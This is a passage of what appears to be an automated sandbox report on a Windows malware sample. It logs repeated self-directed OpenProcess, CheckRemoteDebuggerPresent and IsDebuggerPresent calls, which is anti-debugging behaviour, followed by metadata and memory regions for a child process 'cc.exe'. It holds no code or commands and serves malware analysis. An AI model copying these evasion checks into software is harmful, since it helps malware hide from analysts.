hProcess=0x578, lpExitCode=0x290a9bc | out: lpExitCode=0x290a9bc*=0x103) returned 1 [0162.320] CloseHandle (hObject=0x578) returned 1 [0162.321] OutputDebugStringW (lpOutputString="") [0163.333] GetCurrentProcessId () returned 0xf64 [0163.333] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x57c [0163.333] GetExitCodeProcess (in: hProcess=0x57c, lpExitCode=0x290abe4 | out: lpExitCode=0x290abe4*=0x103) returned 1 [0163.333] CheckRemoteDebuggerPresent (in: hProcess=0x57c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0163.333] IsDebuggerPresent () returned 0 [0163.333] GetCurrentProcessId () returned 0xf64 [0163.334] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x580 [0163.334] GetExitCodeProcess (in: hProcess=0x580, lpExitCode=0x290ac9c | out: lpExitCode=0x290ac9c*=0x103) returned 1 [0163.334] CloseHandle (hObject=0x580) returned 1 [0163.334] OutputDebugStringW (lpOutputString="") [0164.472] GetCurrentProcessId () returned 0xf64 [0164.472] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x584 [0164.472] GetExitCodeProcess (in: hProcess=0x584, lpExitCode=0x290aec4 | out: lpExitCode=0x290aec4*=0x103) returned 1 [0164.472] CheckRemoteDebuggerPresent (in: hProcess=0x584, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0164.473] IsDebuggerPresent () returned 0 [0164.473] GetCurrentProcessId () returned 0xf64 [0164.473] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x588 [0164.473] GetExitCodeProcess (in: hProcess=0x588, lpExitCode=0x290af7c | out: lpExitCode=0x290af7c*=0x103) returned 1 [0164.473] CloseHandle (hObject=0x588) returned 1 [0164.473] OutputDebugStringW (lpOutputString="") [0165.517] GetCurrentProcessId () returned 0xf64 [0165.517] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x58c [0165.517] GetExitCodeProcess (in: hProcess=0x58c, lpExitCode=0x290b1a4 | out: lpExitCode=0x290b1a4*=0x103) returned 1 [0165.517] CheckRemoteDebuggerPresent (in: hProcess=0x58c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0165.518] IsDebuggerPresent () returned 0 [0165.518] GetCurrentProcessId () returned 0xf64 [0165.518] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x590 [0165.518] GetExitCodeProcess (in: hProcess=0x590, lpExitCode=0x290b25c | out: lpExitCode=0x290b25c*=0x103) returned 1 [0165.518] CloseHandle (hObject=0x590) returned 1 [0165.518] OutputDebugStringW (lpOutputString="") [0166.532] GetCurrentProcessId () returned 0xf64 [0166.532] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x594 [0166.533] GetExitCodeProcess (in: hProcess=0x594, lpExitCode=0x290b484 | out: lpExitCode=0x290b484*=0x103) returned 1 [0166.533] CheckRemoteDebuggerPresent (in: hProcess=0x594, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0166.533] IsDebuggerPresent () returned 0 [0166.533] GetCurrentProcessId () returned 0xf64 [0166.533] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x598 [0166.533] GetExitCodeProcess (in: hProcess=0x598, lpExitCode=0x290b53c | out: lpExitCode=0x290b53c*=0x103) returned 1 [0166.533] CloseHandle (hObject=0x598) returned 1 [0166.533] OutputDebugStringW (lpOutputString="") [0168.327] GetCurrentProcessId () returned 0xf64 [0168.327] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x59c [0168.327] GetExitCodeProcess (in: hProcess=0x59c, lpExitCode=0x290b764 | out: lpExitCode=0x290b764*=0x103) returned 1 [0168.328] CheckRemoteDebuggerPresent (in: hProcess=0x59c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0168.328] IsDebuggerPresent () returned 0 [0168.328] GetCurrentProcessId () returned 0xf64 [0168.328] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a0 [0168.328] GetExitCodeProcess (in: hProcess=0x5a0, lpExitCode=0x290b81c | out: lpExitCode=0x290b81c*=0x103) returned 1 [0168.328] CloseHandle (hObject=0x5a0) returned 1 [0168.328] OutputDebugStringW (lpOutputString="") [0169.464] GetCurrentProcessId () returned 0xf64 [0169.464] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x380 [0169.465] GetExitCodeProcess (in: hProcess=0x380, lpExitCode=0x290b8d4 | out: lpExitCode=0x290b8d4*=0x103) returned 1 [0169.465] CheckRemoteDebuggerPresent (in: hProcess=0x380, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0169.465] IsDebuggerPresent () returned 0 [0169.465] GetCurrentProcessId () returned 0xf64 [0169.465] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x384 [0169.465] GetExitCodeProcess (in: hProcess=0x384, lpExitCode=0x290b98c | out: lpExitCode=0x290b98c*=0x103) returned 1 [0169.465] CloseHandle (hObject=0x384) returned 1 [0169.466] OutputDebugStringW (lpOutputString="") [0174.607] GetCurrentProcessId () returned 0xf64 [0174.608] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a0 [0174.608] GetExitCodeProcess (in: hProcess=0x5a0, lpExitCode=0x290bbb4 | out: lpExitCode=0x290bbb4*=0x103) returned 1 [0174.608] CheckRemoteDebuggerPresent (in: hProcess=0x5a0, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0174.608] IsDebuggerPresent () returned 0 [0174.608] GetCurrentProcessId () returned 0xf64 [0174.609] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a4 [0174.609] GetExitCodeProcess (in: hProcess=0x5a4, lpExitCode=0x290bc6c | out: lpExitCode=0x290bc6c*=0x103) returned 1 [0174.609] CloseHandle (hObject=0x5a4) returned 1 [0174.609] OutputDebugStringW (lpOutputString="") [0175.751] GetCurrentProcessId () returned 0xf64 [0175.751] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a8 [0175.751] GetExitCodeProcess (in: hProcess=0x5a8, lpExitCode=0x290be94 | out: lpExitCode=0x290be94*=0x103) returned 1 [0175.751] CheckRemoteDebuggerPresent (in: hProcess=0x5a8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0175.751] IsDebuggerPresent () returned 0 [0175.752] GetCurrentProcessId () returned 0xf64 [0175.752] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5ac [0175.752] GetExitCodeProcess (in: hProcess=0x5ac, lpExitCode=0x290bf4c | out: lpExitCode=0x290bf4c*=0x103) returned 1 [0175.752] CloseHandle (hObject=0x5ac) returned 1 [0175.752] OutputDebugStringW (lpOutputString="") [0176.764] GetCurrentProcessId () returned 0xf64 [0176.764] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5b0 [0176.765] GetExitCodeProcess (in: hProcess=0x5b0, lpExitCode=0x290c180 | out: lpExitCode=0x290c180*=0x103) returned 1 [0176.765] CheckRemoteDebuggerPresent (in: hProcess=0x5b0, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0176.765] IsDebuggerPresent () returned 0 [0176.765] GetCurrentProcessId () returned 0xf64 [0176.765] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5b4 [0176.765] GetExitCodeProcess (in: hProcess=0x5b4, lpExitCode=0x290c238 | out: lpExitCode=0x290c238*=0x103) returned 1 [0176.765] CloseHandle (hObject=0x5b4) returned 1 [0176.765] OutputDebugStringW (lpOutputString="") [0177.794] GetCurrentProcessId () returned 0xf64 [0177.794] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5b8 [0177.794] GetExitCodeProcess (in: hProcess=0x5b8, lpExitCode=0x290c460 | out: lpExitCode=0x290c460*=0x103) returned 1 [0177.794] CheckRemoteDebuggerPresent (in: hProcess=0x5b8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0177.795] IsDebuggerPresent () returned 0 [0177.795] GetCurrentProcessId () returned 0xf64 [0177.795] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5bc [0177.795] GetExitCodeProcess (in: hProcess=0x5bc, lpExitCode=0x290c518 | out: lpExitCode=0x290c518*=0x103) returned 1 [0177.795] CloseHandle (hObject=0x5bc) returned 1 [0177.795] OutputDebugStringW (lpOutputString="") [0178.809] GetCurrentProcessId () returned 0xf64 [0178.809] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5c0 [0178.810] GetExitCodeProcess (in: hProcess=0x5c0, lpExitCode=0x290c740 | out: lpExitCode=0x290c740*=0x103) returned 1 [0178.810] CheckRemoteDebuggerPresent (in: hProcess=0x5c0, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0178.810] IsDebuggerPresent () returned 0 [0178.810] GetCurrentProcessId () returned 0xf64 [0178.810] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5c4 [0178.810] GetExitCodeProcess (in: hProcess=0x5c4, lpExitCode=0x290c7f8 | out: lpExitCode=0x290c7f8*=0x103) returned 1 [0178.810] CloseHandle (hObject=0x5c4) returned 1 [0178.810] OutputDebugStringW (lpOutputString="") [0179.822] GetCurrentProcessId () returned 0xf64 [0179.822] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5c8 [0179.822] GetExitCodeProcess (in: hProcess=0x5c8, lpExitCode=0x290ca20 | out: lpExitCode=0x290ca20*=0x103) returned 1 [0179.822] CheckRemoteDebuggerPresent (in: hProcess=0x5c8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0179.823] IsDebuggerPresent () returned 0 [0179.823] GetCurrentProcessId () returned 0xf64 [0179.823] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5cc [0179.823] GetExitCodeProcess (in: hProcess=0x5cc, lpExitCode=0x290cad8 | out: lpExitCode=0x290cad8*=0x103) returned 1 [0179.823] CloseHandle (hObject=0x5cc) returned 1 [0179.824] OutputDebugStringW (lpOutputString="") [0180.836] GetCurrentProcessId () returned 0xf64 [0180.836] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5d0 [0180.836] GetExitCodeProcess (in: hProcess=0x5d0, lpExitCode=0x290cd00 | out: lpExitCode=0x290cd00*=0x103) returned 1 [0180.836] CheckRemoteDebuggerPresent (in: hProcess=0x5d0, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0180.836] IsDebuggerPresent () returned 0 [0180.836] GetCurrentProcessId () returned 0xf64 [0180.837] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5d4 [0180.837] GetExitCodeProcess (in: hProcess=0x5d4, lpExitCode=0x290cdb8 | out: lpExitCode=0x290cdb8*=0x103) returned 1 [0180.837] CloseHandle (hObject=0x5d4) returned 1 [0180.837] OutputDebugStringW (lpOutputString="") [0181.851] GetCurrentProcessId () returned 0xf64 [0181.851] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5d8 [0181.851] GetExitCodeProcess (in: hProcess=0x5d8, lpExitCode=0x290cfe0 | out: lpExitCode=0x290cfe0*=0x103) returned 1 [0181.851] CheckRemoteDebuggerPresent (in: hProcess=0x5d8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0181.851] IsDebuggerPresent () returned 0 [0181.851] GetCurrentProcessId () returned 0xf64 [0181.851] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5dc [0181.851] GetExitCodeProcess (in: hProcess=0x5dc, lpExitCode=0x290d098 | out: lpExitCode=0x290d098*=0x103) returned 1 [0181.852] CloseHandle (hObject=0x5dc) returned 1 [0181.852] OutputDebugStringW (lpOutputString="") [0182.864] GetCurrentProcessId () returned 0xf64 [0182.864] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5e0 [0182.864] GetExitCodeProcess (in: hProcess=0x5e0, lpExitCode=0x290d2c0 | out: lpExitCode=0x290d2c0*=0x103) returned 1 [0182.864] CheckRemoteDebuggerPresent (in: hProcess=0x5e0, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0182.864] IsDebuggerPresent () returned 0 [0182.865] GetCurrentProcessId () returned 0xf64 [0182.865] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5e4 [0182.865] GetExitCodeProcess (in: hProcess=0x5e4, lpExitCode=0x290d378 | out: lpExitCode=0x290d378*=0x103) returned 1 [0182.865] CloseHandle (hObject=0x5e4) returned 1 [0182.865] OutputDebugStringW (lpOutputString="") [0183.878] GetCurrentProcessId () returned 0xf64 [0183.878] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5e8 [0183.878] GetExitCodeProcess (in: hProcess=0x5e8, lpExitCode=0x290d5a0 | out: lpExitCode=0x290d5a0*=0x103) returned 1 [0183.878] CheckRemoteDebuggerPresent (in: hProcess=0x5e8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0183.878] IsDebuggerPresent () returned 0 [0183.879] GetCurrentProcessId () returned 0xf64 [0183.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5ec [0183.879] GetExitCodeProcess (in: hProcess=0x5ec, lpExitCode=0x290d658 | out: lpExitCode=0x290d658*=0x103) returned 1 [0183.879] CloseHandle (hObject=0x5ec) returned 1 [0183.879] OutputDebugStringW (lpOutputString="") [0184.892] GetCurrentProcessId () returned 0xf64 [0184.892] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5f0 [0184.892] GetExitCodeProcess (in: hProcess=0x5f0, lpExitCode=0x290d880 | out: lpExitCode=0x290d880*=0x103) returned 1 [0184.892] CheckRemoteDebuggerPresent (in: hProcess=0x5f0, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0184.892] IsDebuggerPresent () returned 0 [0184.892] GetCurrentProcessId () returned 0xf64 [0184.893] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5f4 [0184.893] GetExitCodeProcess (in: hProcess=0x5f4, lpExitCode=0x290d938 | out: lpExitCode=0x290d938*=0x103) returned 1 [0184.893] CloseHandle (hObject=0x5f4) returned 1 [0184.893] OutputDebugStringW (lpOutputString="") [0185.906] GetCurrentProcessId () returned 0xf64 [0185.906] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5f8 [0185.906] GetExitCodeProcess (in: hProcess=0x5f8, lpExitCode=0x290db60 | out: lpExitCode=0x290db60*=0x103) returned 1 [0185.906] CheckRemoteDebuggerPresent (in: hProcess=0x5f8, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0185.906] IsDebuggerPresent () returned 0 [0185.906] GetCurrentProcessId () returned 0xf64 [0185.907] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5fc [0185.907] GetExitCodeProcess (in: hProcess=0x5fc, lpExitCode=0x290dc18 | out: lpExitCode=0x290dc18*=0x103) returned 1 [0185.907] CloseHandle (hObject=0x5fc) returned 1 [0185.907] OutputDebugStringW (lpOutputString="") [0186.921] GetCurrentProcessId () returned 0xf64 [0186.921] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x600 [0186.921] GetExitCodeProcess (in: hProcess=0x600, lpExitCode=0x290de40 | out: lpExitCode=0x290de40*=0x103) returned 1 [0186.922] CheckRemoteDebuggerPresent (in: hProcess=0x600, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0186.922] IsDebuggerPresent () returned 0 [0186.922] GetCurrentProcessId () returned 0xf64 [0186.922] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x604 [0186.922] GetExitCodeProcess (in: hProcess=0x604, lpExitCode=0x290def8 | out: lpExitCode=0x290def8*=0x103) returned 1 [0186.922] CloseHandle (hObject=0x604) returned 1 [0186.922] OutputDebugStringW (lpOutputString="") [0187.934] GetCurrentProcessId () returned 0xf64 [0187.934] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x608 [0187.934] GetExitCodeProcess (in: hProcess=0x608, lpExitCode=0x290e12c | out: lpExitCode=0x290e12c*=0x103) returned 1 [0187.934] CheckRemoteDebuggerPresent (in: hProcess=0x608, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0187.934] IsDebuggerPresent () returned 0 [0187.934] GetCurrentProcessId () returned 0xf64 [0187.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x60c [0187.935] GetExitCodeProcess (in: hProcess=0x60c, lpExitCode=0x290e1e4 | out: lpExitCode=0x290e1e4*=0x103) returned 1 [0187.935] CloseHandle (hObject=0x60c) returned 1 [0187.935] OutputDebugStringW (lpOutputString="") [0188.948] GetCurrentProcessId () returned 0xf64 [0188.948] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x610 [0188.948] GetExitCodeProcess (in: hProcess=0x610, lpExitCode=0x290e40c | out: lpExitCode=0x290e40c*=0x103) returned 1 [0188.948] CheckRemoteDebuggerPresent (in: hProcess=0x610, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0188.948] IsDebuggerPresent () returned 0 [0188.948] GetCurrentProcessId () returned 0xf64 [0188.948] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x614 [0188.948] GetExitCodeProcess (in: hProcess=0x614, lpExitCode=0x290e4c4 | out: lpExitCode=0x290e4c4*=0x103) returned 1 [0188.949] CloseHandle (hObject=0x614) returned 1 [0188.949] OutputDebugStringW (lpOutputString="") [0190.024] GetCurrentProcessId () returned 0xf64 [0190.025] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x618 [0190.025] GetExitCodeProcess (in: hProcess=0x618, lpExitCode=0x290e710 | out: lpExitCode=0x290e710*=0x103) returned 1 [0190.025] CheckRemoteDebuggerPresent (in: hProcess=0x618, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0190.025] IsDebuggerPresent () returned 0 [0190.025] GetCurrentProcessId () returned 0xf64 [0190.025] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x61c [0190.025] GetExitCodeProcess (in: hProcess=0x61c, lpExitCode=0x290e7c8 | out: lpExitCode=0x290e7c8*=0x103) returned 1 [0190.025] CloseHandle (hObject=0x61c) returned 1 [0190.025] OutputDebugStringW (lpOutputString="") [0191.038] GetCurrentProcessId () returned 0xf64 [0191.039] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x620 [0191.039] GetExitCodeProcess (in: hProcess=0x620, lpExitCode=0x290e9f0 | out: lpExitCode=0x290e9f0*=0x103) returned 1 [0191.039] CheckRemoteDebuggerPresent (in: hProcess=0x620, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0191.039] IsDebuggerPresent () returned 0 [0191.039] GetCurrentProcessId () returned 0xf64 [0191.040] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x624 [0191.040] GetExitCodeProcess (in: hProcess=0x624, lpExitCode=0x290eaa8 | out: lpExitCode=0x290eaa8*=0x103) returned 1 [0191.040] CloseHandle (hObject=0x624) returned 1 [0191.040] OutputDebugStringW (lpOutputString="") [0192.052] GetCurrentProcessId () returned 0xf64 [0192.052] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x628 [0192.052] GetExitCodeProcess (in: hProcess=0x628, lpExitCode=0x2911b48 | out: lpExitCode=0x2911b48*=0x103) returned 1 [0192.052] CheckRemoteDebuggerPresent (in: hProcess=0x628, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0192.052] IsDebuggerPresent () returned 0 [0192.053] GetCurrentProcessId () returned 0xf64 [0192.053] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x62c [0192.053] GetExitCodeProcess (in: hProcess=0x62c, lpExitCode=0x2911c00 | out: lpExitCode=0x2911c00*=0x103) returned 1 [0192.053] CloseHandle (hObject=0x62c) returned 1 [0192.053] OutputDebugStringW (lpOutputString="") Thread: id = 48 os_tid = 0xfc4 Thread: id = 49 os_tid = 0xfc8 Process: id = "2" image_name = "cc.exe" filename = "c:\\users\\keecfmwgj\\desktop\\cc.exe" page_root = "0x3e795000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf64" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\"" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 467 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 468 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 469 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 470 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 471 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 472 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 473 start_va = 0x13d0000 end_va = 0x141dfff monitored = 1 entry_point = 0x14095ce region_type = mapped_file name = "cc.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\cc.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe") Region: id = 474 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 475 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 476 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 477 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 478 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 479 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 480 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 481 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 482 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 483 start_va = 0x60000 end_va = 0x88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 484 start_va = 0x5a0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 485 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 486 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 487 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 488 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 489 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 490 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 491 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 492 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 493 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 494 start_va = 0x620000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 495 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 496 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 497 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 498 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 499 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = 